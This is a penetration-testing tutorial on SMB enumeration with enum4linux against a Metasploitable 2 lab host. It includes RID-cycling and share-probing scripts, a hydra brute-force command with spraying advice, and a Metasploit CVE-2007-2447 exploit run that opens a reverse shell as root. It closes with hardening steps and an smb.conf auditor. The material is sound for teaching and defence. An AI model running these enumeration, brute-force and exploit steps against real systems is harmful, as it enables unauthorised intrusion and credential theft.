One of the most frequently targeted protocols for enumeration is SMB (Server Message Block) — a protocol used for file sharing, printer sharing, and communication between devices on Windows networks.
This article documents a practical demo by a penetration tester, using enum4linux as the primary SMB enumeration tool. Every step is explained with simulated terminal output, technical analysis and the security implications of what the output shows.
⚠️ IMPORTANT DISCLAIMER: All information in this article is intended for cybersecurity education purposes. Performing enumeration or exploitation against systems without written permission is illegal and can lead to criminal charges. Always use personal labs, VMs, or platforms like HackTheBox/TryHackMe for practice.
What is SMB Enumeration?
SMB Enumeration is the process of gathering information from systems running SMB services (ports 139/tcp and 445/tcp). The information that can be obtained includes:

Tools Used
1. enum4linux
Classic tool for SMB enumeration. It is a Perl wrapper around four Samba client utilities:
nmblookup, net, smbclient, rpcclient
Installation:
sudo apt update && sudo apt install enum4linux -y
2. SMBClient
For manually accessing SMB shares.
3. Nmap
For port scanning and service detection.
4. Metasploit Framework
For advanced exploitation.
Complete Step-by-Step Lab Practice
Phase 0: Lab Setup
Attacker: Kali Linux (192.168.1.100)
Target: Metasploitable 2 (192.168.1.110)
Phase 1: Root Access
┌──(user㉿kali)-[~]
└─$ sudo su
[sudo] password for user:
┌──(root㉿kali)-[~]
└─#
Why root? enum4linux itself needs no privileges: it only drives smbclient, rpcclient, net and nmblookup, so every enumeration step below works as an unprivileged user. Root matters for Nmap's raw-socket scan types (ARP host discovery on the local subnet with -sn, SYN scans with -sS, OS detection with -O); without it the -sV scan in Phase 3 falls back to full TCP connects, which is slower and noisier but gives the same version banner.
Phase 2: Target Identification
┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.1.0/24
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.1.110
Host is up (0.0012s latency).
✅ Target found: 192.168.1.110
Phase 3: Service Discovery
┌──(root㉿kali)-[~]
└─# nmap -p 139,445 -sV 192.168.1.110
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.x - 4.x (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian
📌 Target running Samba 3.0.20-Debian, a 2005-era release that has been out of support for years. Note that the exact version comes from the 445 banner; port 139 only gives the 3.X - 4.X range.
Phase 4: Connectivity Test
┌──(root㉿kali)-[~]
└─# ping -c 3 192.168.1.110
PING 192.168.1.110 (192.168.1.110) 56(84) bytes of data.
64 bytes from 192.168.1.110: icmp_seq=1 ttl=64 time=0.85 ms
64 bytes from 192.168.1.110: icmp_seq=2 ttl=64 time=0.79 ms
64 bytes from 192.168.1.110: icmp_seq=3 ttl=64 time=0.91 ms
✅ Target reachable (an arriving TTL of 64 is the Linux default with no router in between, consistent with the Samba/Unix banner). Ready for enumeration.
Phase 5: Running enum4linux (Full Scan)
┌──(root㉿kali)-[~]
└─# enum4linux -a 192.168.1.110
Flag -a = do all simple enumeration; it is shorthand for -U (users) -S (shares) -G (groups) -P (password policy) -r (RID cycling) -o (OS info) -n (nmblookup) -i (printers). Everything is attempted over a null session (empty username and password); once credentials turn up, rerun with -u user -p pass, which usually returns far more.
Output Analysis and Data Interpretation
A. Target Information
=====================================
| Target Information |
=====================================
Target ........... 192.168.1.110
RID Range ........ 500-550,1000-1050
✅ RID (Relative Identifier) Range: the RID is the last component of an account's SID. For RID cycling enum4linux takes the domain SID and asks rpcclient's lookupsids to resolve every RID in this range; RIDs that resolve to a name are accounts or groups. The default range stops at 1050, so the 2000-series accounts that appear below are only found with a wider range, e.g. enum4linux -R 500-550,1000-1050,2000-2050 192.168.1.110.
B. OS Information
=====================================
| OS Information |
=====================================
[+] Got OS info for 192.168.1.110 from smbclient:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
⚠️ CRITICAL: Samba 3.0.20 falls in the 3.0.0 to 3.0.25rc3 range affected by CVE-2007-2447, a command injection in the "username map script" handling that yields remote code execution as the smbd process user (root on Metasploitable 2). It is only exploitable when smb.conf configures a username map script, which Metasploitable 2 does; the Metasploit module is exploit/multi/samba/usermap_script.
C. NetBIOS & Domain Info
=====================================
| NBTstat Information |
=====================================
[+] NetBIOS Name Table:
METASPLOITABLE <00> - B Workstation Service
METASPLOITABLE <03> - B Messenger Service
METASPLOITABLE <20> - B File Server Service
WORKGROUP <00> - <GROUP> B Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B Browser Service Elections
📌 <20> = File Server Service (file sharing is active). <00> on the host name = Workstation Service; <00> on the group name = the workgroup the host belongs to. The B flag is the NetBIOS node type: broadcast name resolution, no WINS server.
D. Session & User Enumeration
=====================================
| Session Check |
=====================================
[+] Server 192.168.1.110 allows sessions using username '', password ''
User Name : <unknown>
Logon Domain : METASPLOITABLE
📌 A null session (empty username and password on the IPC$ pipe) succeeded. Everything that follows, RID cycling, share listing and the password policy, rides on this single misconfiguration.
=====================================
| User Enumeration |
=====================================
[+] Local Users via SAMR (RID Cycling):
RID: 500, User: administrator
RID: 501, User: nobody
RID: 502, User: klog
RID: 1000, User: root
RID: 1001, User: daemon
RID: 1002, User: bin
RID: 1003, User: sys
RID: 1004, User: sync
RID: 1005, User: games
RID: 1006, User: man
RID: 1007, User: lp
RID: 1008, User: mail
RID: 1009, User: news
RID: 1010, User: uucp
RID: 1011, User: proxy
RID: 1012, User: www-data
RID: 1013, User: backup
RID: 1014, User: list
RID: 1015, User: irc
RID: 1016, User: gnats
RID: 1017, User: nobody
RID: 1018, User: libuuid
RID: 1019, User: dhcp
RID: 1020, User: syslog
RID: 1021, User: klog
RID: 1022, User: sshd
RID: 1023, User: bind
RID: 1024, User: postfix
RID: 1025, User: ftp
RID: 1026, User: postgres
RID: 1027, User: mysql
RID: 1028, User: tomcat55
RID: 1029, User: distccd
RID: 1030, User: user
RID: 1031, User: service
RID: 1032, User: telnetd
RID: 1033, User: proftpd
RID: 1034, User: statd
RID: 2000, User: msfadmin
RID: 2001, User: bind
RID: 2002, User: syslog
RID: 2003, User: postfix
🔥 40+ account names identified over a null session. This is a goldmine for attackers: it is the username list for the password attack in the next section.
Important Users:
- administrator, RID 500 (default admin)
- root, RID 1000
- msfadmin, RID 2000 (well-known credentials: msfadmin:msfadmin)
- postgres, mysql, tomcat55: service accounts (potential default passwords)
Caveat: on a Samba host RID cycling also returns Unix groups. Samba's algorithmic mapping gives users even RIDs (uid * 2 + 1000) and groups odd RIDs (gid * 2 + 1001), so a name that appears twice (nobody, klog, bind, syslog, postfix above) is typically the user and the group of that name. lookupsids reports the SID type, which enum4linux prints as (Local User) or (Local Group); deduplicate and drop the groups before feeding the list to hydra.
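The RID cycling that produced the list above, as an added shell example written for this article rather than taken from enum4linux's source: it expands the range spec, resolves SIDs in batches with rpcclient's lookupsids (enum4linux issues one call per RID; batching is the one deliberate change), and keeps only type 1 (user) replies. The host, the domain SID S-1-5-21-1-2-3 and the lines in sample_lookupsids are constructed for the demo, not captured from a target; only get_domain_sid and rid_cycle talk to a host.

```shell
#!/bin/sh
# RID cycling as enum4linux -r performs it, reduced to three steps:
# expand the RID range spec, resolve batches of SIDs with rpcclient, parse the replies.
# Only get_domain_sid and rid_cycle touch the network; the helpers work on text.

# Expand an enum4linux-style range spec ("500-550,1000-1050") into a space-separated RID list.
expand_rid_range() {
    _spec=$1; _out=""
    _old_ifs=$IFS; IFS=','
    for _part in $_spec; do
        case $_part in
            *-*) _lo=${_part%-*}; _hi=${_part#*-} ;;
            *)   _lo=$_part;       _hi=$_part ;;
        esac
        _i=$_lo
        while [ "$_i" -le "$_hi" ]; do
            _out="$_out $_i"
            _i=$((_i + 1))
        done
    done
    IFS=$_old_ifs
    printf '%s\n' "${_out# }"
}

# Domain SID via LSA over a null session. A workgroup host may answer "(NULL SID)";
# enum4linux then derives the SID from "lookupnames <known account>" instead, as below.
get_domain_sid() {   # usage: get_domain_sid <host>
    _host=$1
    _sid=$(rpcclient -U '' -N "$_host" -c lsaquery 2>/dev/null \
           | sed -n 's/^Domain Sid: \(S-1-5-21-[0-9-]*\)$/\1/p')
    if [ -z "$_sid" ]; then
        _sid=$(rpcclient -U '' -N "$_host" -c 'lookupnames administrator' 2>/dev/null \
               | sed -n 's/^administrator \(S-1-5-21-[0-9-]*\)-[0-9]* .*/\1/p')
    fi
    printf '%s\n' "$_sid"
}

# Parse rpcclient "lookupsids" replies such as
#   S-1-5-21-1-2-3-500 METASPLOITABLE\Administrator (1)
#   S-1-5-21-1-2-3-503 *unknown*\*unknown* (8)
# keeping only type 1 (user) entries; groups are type 2, unmapped RIDs type 8.
parse_lookupsids() {
    sed -n 's/^S-1-5-21-[0-9-]*-\([0-9][0-9]*\) [^\\]*\\\([^ ]*\) (1)$/RID: \1, User: \2/p'
}

# Drive the cycle: 20 SIDs per rpcclient call instead of one process per RID.
rid_cycle() {   # usage: rid_cycle <host> <domain SID> [range]
    _host=$1; _domain_sid=$2; _range=${3:-500-550,1000-1050}
    set -- $(expand_rid_range "$_range")
    while [ $# -gt 0 ]; do
        _batch=""; _n=0
        while [ $# -gt 0 ] && [ $_n -lt 20 ]; do
            _batch="$_batch $_domain_sid-$1"; shift; _n=$((_n + 1))
        done
        rpcclient -U '' -N "$_host" -c "lookupsids$_batch" 2>/dev/null | parse_lookupsids
    done
}

# Constructed sample of lookupsids output (not from a real host) so the parser runs offline.
sample_lookupsids() {
    printf '%s\n' \
        'S-1-5-21-1-2-3-500 METASPLOITABLE\Administrator (1)' \
        'S-1-5-21-1-2-3-513 METASPLOITABLE\Domain Users (2)' \
        'S-1-5-21-1-2-3-503 *unknown*\*unknown* (8)' \
        'S-1-5-21-1-2-3-1000 METASPLOITABLE\root (1)'
}

# Usage against a lab host (source this file first):
#   sid=$(get_domain_sid 192.168.1.110)
#   rid_cycle 192.168.1.110 "$sid" 500-550,1000-1050,2000-2050
```

The range widened to 2000-2050 is what it takes to see the msfadmin entry; the default range alone stops at 1050.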
E. Share Enumeration
=====================================
| Share Enumeration |
=====================================
[+] Share list from smbclient -L (srvsvc NetShareEnum over the null session):
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
[+] Attempting to access shares with anonymous logon:
//192.168.1.110/tmp Mapping: OK, Listing: OK
//192.168.1.110/opt Mapping: OK, Listing: OK
//192.168.1.110/IPC$ [E] Can't browse with anonymous
//192.168.1.110/ADMIN$ [E] Can't browse with anonymous
⚠️ CRITICAL: the tmp and opt shares can be mapped and listed without authentication. IPC$ and ADMIN$ refusing a browse is normal (IPC$ is the named-pipe endpoint, not a directory); the finding is the two Disk shares.
Check Share Contents:
┌──(root㉿kali)-[~]
└─# smbclient //192.168.1.110/tmp -N
Anonymous login successful
smb: \> ls
. D 0 Wed Feb 12 18:30:15 2026
.. D 0 Wed Feb 12 18:30:10 2026
backup.sh A 123 Wed Feb 12 18:25:00 2026
credentials.txt A 450 Wed Feb 12 18:20:30 2026
shell.php A 750 Wed Feb 12 18:15:45 2026
📌 credentials.txt is readable by anyone on the network; smbclient's get pulls it down immediately. A shell.php sitting in a share named tmp suggests the share is also writable and already in use as a drop point: check write access (smbclient put) and report that separately from the read exposure.
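The share probe enum4linux runs in its "Attempting to access shares" step, reimplemented as an added shell example (not enum4linux's own code and not output from the lab): list the shares over a null session, try to map and then list each Disk share, and grep the listing for loot-looking file names. sample_share_list and sample_listing embed constructed text shaped like the smbclient output above so the parsers can be checked without a target; the name patterns in flag_sensitive are this article's choice, not a standard.

```shell
#!/bin/sh
# Anonymous share check: null-session listing, map/list each Disk share, flag loot.
# Only probe_shares, probe_share and list_share call smbclient; the parsers run on text.

# Pull Disk share names out of "smbclient -L //host -N" output (column 2 is the type).
parse_share_list() {
    awk '$2 == "Disk" { print $1 }'
}

# Map, then list, one share with an empty username and no password.
# Prints the same three states enum4linux reports for a share.
probe_share() {   # usage: probe_share <host> <share>
    _host=$1; _share=$2
    if ! smbclient "//$_host/$_share" -N -c 'exit' >/dev/null 2>&1; then
        echo "//$_host/$_share Mapping: DENIED, Listing: N/A"
    elif smbclient "//$_host/$_share" -N -c 'ls' >/dev/null 2>&1; then
        echo "//$_host/$_share Mapping: OK, Listing: OK"
    else
        echo "//$_host/$_share Mapping: OK, Listing: DENIED"
    fi
}

probe_shares() {   # usage: probe_shares <host>
    _host=$1
    for _share in $(smbclient -L "//$_host" -N 2>/dev/null | parse_share_list); do
        probe_share "$_host" "$_share"
    done
}

# "smbclient -c ls" lines look like:  credentials.txt  A  450  Wed Feb 12 18:20:30 2026
# Print file names (attribute column without D, i.e. not directories) that match the
# patterns. Names containing spaces shift the columns and are not handled here.
flag_sensitive() {
    awk '$2 !~ /D/ && tolower($1) ~ /(cred|passw|secret|\.key$|id_rsa|\.php$|\.sh$|\.kdbx$|\.config$)/ { print $1 }'
}

list_share() {   # usage: list_share <host> <share>  -> prints loot candidates only
    smbclient "//$1/$2" -N -c 'ls' 2>/dev/null | flag_sensitive
}

# Constructed samples (not captured from a real host) so the parsers can be exercised offline.
sample_share_list() {
    printf '\t%s\n' \
        'Sharename       Type      Comment' \
        '---------       ----      -------' \
        'print$          Disk      Printer Drivers' \
        'tmp             Disk      oh noes!' \
        'opt             Disk      ' \
        'IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))' \
        'ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))'
}
sample_listing() {
    printf '  %s\n' \
        '.                                   D        0  Wed Feb 12 18:30:15 2026' \
        '..                                  D        0  Wed Feb 12 18:30:10 2026' \
        'backup.sh                           A      123  Wed Feb 12 18:25:00 2026' \
        'credentials.txt                     A      450  Wed Feb 12 18:20:30 2026' \
        'shell.php                           A      750  Wed Feb 12 18:15:45 2026' \
        'notes                               D        0  Wed Feb 12 18:10:00 2026'
}

# Usage against a lab host (source this file first):
#   probe_shares 192.168.1.110
#   list_share 192.168.1.110 tmp
```

Mapping and listing are tested separately because Samba can grant a tree connect and still refuse the directory listing; enum4linux distinguishes the two and so does the probe.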
F. Password Policy Information
=====================================
| Password Policy Information |
=====================================
[+] Attempting to get password policy via SAMR...
[+] Password policy for domain METASPLOITABLE:
Password min length: 5
Password history length: 0
Password properties: 0x00000000 (DOMAIN_PASSWORD_COMPLEX=0)
Minimum password age: 0 days
Maximum password age: 42 days
Lockout threshold: Not Set
Lockout duration: Not Set
Lockout observation window: Not Set
⚠️ CRITICAL:
- No password complexity requirement
- Minimum length only 5 characters
- No lockout threshold, so online guessing never locks an account
Brute force, or a password spray across the 40+ names above, can run at full speed without tripping a lockout.
Case Study: Vulnerable vs Secure Target
Case 1: Metasploitable (Vulnerable Target)
# Result: FULL INFORMATION OBTAINED
40+ users enumerated
2 anonymous shares
Weak password policy
Legacy Samba version (3.0.20)
Case 2: Windows Server 2019 Hardened (Secure Target)
# Result: MINIMAL INFORMATION
=====================================
| Session Check |
=====================================
[-] Null sessions are disabled on this target.
[-] Unable to enumerate users (STATUS_ACCESS_DENIED).
=====================================
| Share Enumeration |
=====================================
[-] Access denied listing shares (requires authentication).
📌 Difference: proper configuration (null sessions refused, anonymous SAM and share enumeration blocked) gives the tool nothing to work with; enum4linux is only as good as the null session it gets. Against such a host, enumeration has to be repeated with a valid low-privilege credential (enum4linux -u user -p pass), which is usually where the real findings come from.
Post-Enumeration Attack Vectors
After obtaining information from enum4linux, attackers can proceed to the exploitation phase:
1. Brute Force Credentials
Check the password policy first (above: no lockout threshold), then feed the enumerated names to hydra:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb://192.168.1.110
Hydra's smb module speaks SMBv1, which this target accepts; newer hydra releases ship a separate smb2 module for hosts that no longer negotiate SMBv1. Against a target that does have a lockout threshold, spray one password across all users per observation window instead of running a full wordlist per user.
2. Access Insecure Shares
smbclient //192.168.1.110/tmp -N
get credentials.txt
3. Exploit Samba usermap_script (CVE-2007-2447)
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.110
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.1.100
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.110:37582)
whoami
root
Mitigation and Defense
For System Administrators:
1. Disable SMBv1 (obsolete and insecure)
- Windows (PowerShell): Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol removes the feature; Set-SmbServerConfiguration -EnableSMB1Protocol $false turns it off on the server side
- Samba: server min protocol = SMB2_02 in the [global] section of smb.conf
2. Disable null sessions and anonymous enumeration
- Windows: set RestrictNullSessAccess = 1 under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, and RestrictAnonymous = 1 plus RestrictAnonymousSAM = 1 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (the policy "Network access: Do not allow anonymous enumeration of SAM accounts and shares" sets the latter)
- Samba: restrict anonymous = 2 in smb.conf, map to guest = Never, and guest ok = no on every share (the tmp and opt findings above are guest shares)
3. Enforce Strong Password Policy
- Minimum length 12 characters or more
- Enable password complexity
- Set a lockout threshold (e.g., 5 attempts) with an observation window, which is what makes the hydra run above infeasible
4. Firewall Rules
- Restrict access to ports 139 and 445 to trusted subnets only; 139 can usually be closed entirely
5. Regular Patching
- Samba 3.x is end-of-life: upgrade to a supported Samba 4.x release (the usermap_script bug alone is sufficient reason)
- Regular Windows Updates
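The Samba side of the hardening list, as an added example that is not part of the original article: a small smb.conf auditor in shell that reports the settings enum4linux was able to take advantage of, together with two constructed configurations (the weak one mirrors the posture found on the target, the hardened one is the corrected version of the same file; neither is Metasploitable 2's actual smb.conf). Parameter names and defaults are those of current Samba 4.x; confirm with testparm -v on the version you run.

```shell
#!/bin/sh
# Audit an smb.conf for the settings behind this article's findings: anonymous (null-session)
# access, SMBv1 negotiation, guest fall-through and guest-readable shares.
# Pure text processing (awk, coreutils), so it runs without Samba installed.

# Print the effective value of one [global] parameter (last assignment wins, as in Samba).
smb_global_param() {   # usage: smb_global_param <smb.conf> <parameter name>
    awk -v key="$2" '
        /^[ \t]*\[/ { in_global = (tolower($0) ~ /^[ \t]*\[global[]]/); next }
        in_global && !/^[ \t]*[;#]/ && index($0, "=") {
            eq = index($0, "=")
            k = substr($0, 1, eq - 1); gsub(/^[ \t]+|[ \t]+$/, "", k)
            v = substr($0, eq + 1);    gsub(/^[ \t]+|[ \t]+$/, "", v)
            if (tolower(k) == tolower(key)) val = v
        }
        END { if (val != "") print val }' "$1"
}

# Print the names of sections that allow guest access (guest ok = yes, or its synonym public).
guest_shares() {   # usage: guest_shares <smb.conf>
    awk '
        /^[ \t]*\[/ { sec = $0; sub(/^[ \t]*\[/, "", sec); sub(/[]].*$/, "", sec); next }
        !/^[ \t]*[;#]/ && index($0, "=") {
            eq = index($0, "=")
            k = tolower(substr($0, 1, eq - 1)); gsub(/^[ \t]+|[ \t]+$/, "", k)
            v = tolower(substr($0, eq + 1));    gsub(/^[ \t]+|[ \t]+$/, "", v)
            if ((k == "guest ok" || k == "public") && (v == "yes" || v == "true" || v == "1"))
                print sec
        }' "$1"
}

# One line per weak setting; prints nothing for a hardened file.
audit_smb_conf() {   # usage: audit_smb_conf <smb.conf>
    _conf=$1
    _ra=$(smb_global_param "$_conf" "restrict anonymous")
    [ "${_ra:-0}" = "2" ] || \
        echo "restrict anonymous = ${_ra:-0 (default)}: set 2 to refuse anonymous (null-session) connections outright"
    _minp=$(smb_global_param "$_conf" "server min protocol" | tr '[:lower:]' '[:upper:]')
    case "${_minp:-UNSET}" in
        SMB2*|SMB3*) ;;
        *) echo "server min protocol = ${_minp:-unset}: SMBv1 may still be negotiated; set SMB2_02 or higher explicitly" ;;
    esac
    _mtg=$(smb_global_param "$_conf" "map to guest" | tr '[:upper:]' '[:lower:]')
    [ "${_mtg:-never}" = "never" ] || \
        echo "map to guest = $_mtg: failed logons fall through to the guest account; set Never"
    for _s in $(guest_shares "$_conf"); do
        echo "section [$_s] sets guest ok = yes: the share can be mapped without credentials"
    done
}

count_findings() { audit_smb_conf "$1" | grep -c . || true; }

# Constructed sample configurations (not the target's real smb.conf): the first reproduces
# the posture the enumeration found, the second is the corrected version of the same file.
write_weak_conf() {   # usage: write_weak_conf <path>
    cat > "$1" <<'EOF'
[global]
   workgroup = WORKGROUP
   server string = metasploitable server
   security = user
   map to guest = Bad User
   ; restrict anonymous and server min protocol left at their defaults

[tmp]
   comment = oh noes!
   path = /tmp
   guest ok = yes
   writable = yes
EOF
}

write_hardened_conf() {   # usage: write_hardened_conf <path>
    cat > "$1" <<'EOF'
[global]
   workgroup = WORKGROUP
   security = user
   restrict anonymous = 2
   map to guest = Never
   server min protocol = SMB2_02

[tmp]
   path = /srv/tmp
   guest ok = no
   valid users = @staff
   writable = yes
EOF
}

# Usage: audit_smb_conf /etc/samba/smb.conf
```

restrict anonymous = 2 also blocks the IPC$ null session that enum4linux, rpcclient and smbclient -L all depend on, so after the change the tool should produce the same near-empty output as the hardened Windows case above.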